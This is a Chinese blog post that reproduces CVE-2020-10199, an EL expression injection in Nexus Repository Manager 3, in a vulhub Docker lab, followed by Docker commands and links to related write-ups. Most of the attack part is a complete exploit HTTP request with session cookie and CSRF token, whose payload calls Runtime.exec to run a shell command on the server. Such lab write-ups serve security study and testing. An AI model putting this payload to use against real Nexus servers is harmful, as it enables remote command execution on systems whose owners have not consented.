Nexus Repository Manager 3 远程命令执行漏洞(CVE-2020-10199)

最新推荐文章于 2024-07-12 14:33:22 发布
最新推荐文章于 2024-07-12 14:33:22 发布
阅读量1.2k 收藏
点赞数
分类专栏: 中间件漏洞复现 文章标签: 安全漏洞 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zy15667076526/article/details/110715101
版权

声明

好好学习,天天向上

漏洞描述

Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。其3.21.1及之前版本中,存在一处任意EL表达式注入漏洞。

影响范围

Nexus Repository Manager 3.x OSS / Pro <= 3.21.1

复现过程

这里使用3.21.1版本

使用vulhub

cd /app/vulhub-master/nexus/CVE-2020-10199

使用docker启动

docker-compose up -d

等待一段时间环境才能成功启动,访问如下链接即可看到Web页面。

http://your-ip:8081

该漏洞需要访问更新角色或创建角色接口,所以我们需要使用账号密码admin:admin登录后台(右上角Sign In)。

登录后,还需要再做一些配置,改密码吖等等

完成后,在登录状态随便一个页面刷新,抓包,获取当前用户的Cookie

然后把Cookie和CSRF Token和替换到下面POC中,该替换IP、TOKEN、Cookie的地方,都别忘了

POST /service/rest/beta/repositories/go/group HTTP/1.1
Host: 192.168.239.129:8081
Content-Length: 197
X-Requested-With: XMLHttpRequest
X-Nexus-UI: true
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.4256948739162416
Content-Type: application/json
Accept: */*
Origin: http://192.168.239.129:8081
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: http://192.168.239.129:8081/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: NX-ANTI-CSRF-TOKEN=0.4256948739162416; NXSESSIONID=e014e016-4683-4123-903a-b59fbe6bbaa7
Connection: close

{
  "name": "internal",
  "online": true,
  "storage": {
    "blobStoreName": "default",
    "strictContentTypeValidation": true
  },
  "group": {
    "memberNames": ["$\\A{2*3*3}"]
  }
}

在这里插入图片描述

将POC中

$\\A{2*3*3}

替换为

$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/cve-2020-10199')}

替换后整个EXP如下

POST /service/rest/beta/repositories/go/group HTTP/1.1
Host: 192.168.239.129:8081
Content-Length: 197
X-Requested-With: XMLHttpRequest
X-Nexus-UI: true
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.4256948739162416
Content-Type: application/json
Accept: */*
Origin: http://192.168.239.129:8081
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: http://192.168.239.129:8081/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: NX-ANTI-CSRF-TOKEN=0.4256948739162416; NXSESSIONID=e014e016-4683-4123-903a-b59fbe6bbaa7
Connection: close

{
  "name": "internal",
  "online": true,
  "storage": {
    "blobStoreName": "default",
    "strictContentTypeValidation": true
  },
  "group": {
    "memberNames": ["$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/cve-2020-10199')}"]
  }
}

在这里插入图片描述

在这里插入图片描述

使用完后关闭镜像

docker-compose down

docker-compose常用命令

拉镜像(进入到vulhub某个具体目录后)

docker-compose build
docker-compose up -d

镜像查询(查到的第一列就是ID值)

docker ps -a

进入指定镜像里面(根据上一条查出的ID进入)

docker exec -it ID /bin/bash

关闭镜像(每次用完后关闭)

docker-compose down
维梓-
关注
专栏目录
Sonatype Nexus Repository Manager 3远程代码执行漏洞CVE-2019-7238)
不忘初心,护天下安全!
07-12 1759
研究人员在 Sonatype Nexus Repository Manager ( NXRM ) 3 中发现一个远程代码执行漏洞。Sonatype Nexus Repository Manager ( NXRM ) 3 是一个允许开发者管理软件开发、应用实现、自动硬件提供所必须的软件组件的开源项目。漏洞影响的 NXRM 3 目前安装量已经超过 15 万,该漏洞是腾讯安全云鼎实验室安全研究员 Rico 和长亭科技安全研究员 voidfyoo 发现的。研究人员通过分析发现利用该安全漏洞并不需要认证。因此攻击者很
CVE-2020-10199 Nexus Repository Manager3远程命令执行漏洞复现
weixin_45260839的博客
05-29 1722
CVE-2020-10199 Nexus Repository Manager3远程命令执行漏洞复现
Nexus Repository Manager 3 远程命令执行漏洞复现(CVE-2020-10199
m0_68045701的博客
07-06 561
Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。其3.21.1及之前版本中,存在一处任意EL表达式注入漏洞。在攻击机kali上访问go/group API接口。Execute执行,并用burp suite抓包。抓包修改报文,使其可以创建一个666.sh文件。进入容器查看成功创建文件。执行,成功获取shell。进入msf找到相应模块。设置sessions。ps:监听要提前开启。
Nexus Repository Manager3( CVE-2020-10199) 远程命令执行漏洞排查
dayouzi的博客
08-14 1244
nexus的全称是Nexus Repository Manager,是Sonatype公司的一个产品。它是一个强大的仓库管理器,极大地简化了内部仓库的维护和外部仓库的访问。主要用它来搭建公司内部的maven私服。但是它的功能不仅仅是创建maven私有仓库这么简单,还可以作为nuget、docker、npm、bower、pypi、rubygems、git lfs、yum、go、apt等的私有仓库,功能非常强大。
Nexus Repository Manager3远程命令执行漏洞复现CVE-2020-10199
m0_48520508的博客
03-02 1418
0x00 简介 nexus的全称是Nexus Repository Manager,是Sonatype公司的一个产品。它是一个强大的仓库管理器,极大地简化了内部仓库的维护和外部仓库的访问。 主要用它来搭建公司内部的maven私服。但是它的功能不仅仅是创建maven私有仓库这么简单,还可以作为nuget、docker、npm、bower、pypi、rubygems、git lfs、yum、go、apt等的私有仓库,功能非常强大。 0x01漏洞概述 在 Nexus Repository Manager OSS
Nexus Repository Manager 3 远程命令执行漏洞环境搭建及复现(CVE-2019-7238)
qq_36369941的博客
07-17 3166
简介 Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。其3.14.0及之前版本中,存在一处基于OrientDB自定义函数的任意JEXL表达式执行功能,而这处功能存在未授权访问漏洞,将可以导致任意命令执行漏洞。 影响范围 Nexus Repository Manager OSS/Pro 3.6.2 版本到 3.14.0 版...
Nexus远程命令执行CVE-2020-10199
Adminxe的博客
12-03 1216
0x01 漏洞描述 2020年03月31 日,Sonatype 官方发布安全公告,声明修复了存在于 Nexus Repository Manager 3 中的远程代码执行漏洞 CVE-2020-10199。   Sonatype Nexus 是一个 Maven 的仓库管理系统,它提供了强大的仓库管理、构件搜索等功能,并且可以用来搭建 Maven 仓库私服,在代理远程仓库的同时维护本地仓库,以节省带宽和时间。   在 Nexus Repository Manager OSS/Pro 3.21.1 及..
Nexus Repository Manager 3 远程命令执行漏洞CVE-2019-7238)
黑白的博客
12-05 441
声明 好好学习,天天向上 漏洞描述 Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。其3.14.0及之前版本中,存在一处基于OrientDB自定义函数的任意JEXL表达式执行功能,而这处功能存在未授权访问漏洞,将可以导致任意命令执行漏洞。 影响范围 Nexus Repository Manager 3.x OSS / Pro <= 3.14.0 复现过程 这里使用3.14.0版本 使用vulhub cd /app/vulhub
CVE-2020-11444:Nexus Repository Manager 3 远程命令执行漏洞
冬的博客
03-15 7141
简介 Nexus Repository是一个开源的仓库管理系统,可搭建npm、maven等私服。 Nexus 3 任意修改admin密码越权漏洞,可以用低权限用户登录获取sessionID越权进行修改admin用户的密码 影响版本 Nexus Repository Manager 3.x OSS / Pro <= 3.21.1 复现步骤 本文复现环境为攻击机kali,目标机为ubuntu 1、环境搭建 环境搭建利用vulhub中的CVE-2020-10144漏洞环境进行复现,其对应版本为3
vulhub中Nexus Repository Manager 3 未授权目录穿越漏洞CVE-2024-4956)
yougexiaojiuguan的博客
06-02 576
漏洞复现过程的记录
Nexus Repository Manager 3 远程命令执行漏洞 CVE-2019-7238 漏洞复现
MDSEC的博客
08-18 406
​ SNexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。其3.14.0及之前版本中,存在一处基于OrientDB自定义函数的任意JEXL表达式执行功能,而这处功能存在未授权访问漏洞,将可以导致任意命令执行漏洞。然后在虚拟机上检验是否成功。这样漏洞复现就完成了。微信公众号:猫蛋儿安全。
Nexus 远程命令执行漏洞 CVE-2020-10199复现
最新发布
qq_62056583的博客
07-12 2048
nexus 远程代码执行CVE-2020-10199漏洞是一个基于maven的仓库管理器,漏洞主要是不安全的执行了EL表达式导致的,根据网上的内容也就明白了为什么对于memberNames中的值进行修改和插入payload的操作了,这跟CVE-2019-7238漏洞原理也有异曲同工之处,同样是通过对于一些定义的函数不加以检查然后导致出现漏洞被用来注入执行远程代码。
nexus 远程代码执行CVE-2020-10199
m0_60716947的博客
12-20 1153
nexus 远程代码执行CVE-2020-10199
CVE-2020-10199: Nexus Repository Manager代码执行通告
爱国小白帽
04-02 1432
CVE-2020-10199: Nexus Repository Manager代码执行通告 360-CERT [360CERT](javascript:void(0)???? 今天 0x00 漏洞背景 2020年04月02日, 360CERT监测发现 Sonatype Security Team 官方发布了一则关于 Nexus Repository Manager 3.x 的远程代码执行漏洞通告。在...
Nexus Repository Manager 3 远程命令执行漏洞CVE-2020-10204)复现
玄道的网安博客
04-28 1118
漏洞概述 Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。其3.21.1及之前版本中,存在一处任意EL表达式注入漏洞 影响版本 Nexus Repository Manager OSS/Pro 3.x <= 3.21.1 环境搭建 https://github.com/vulhub/vulhub/tree/master/nexus/CVE-2020-10204 docker...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值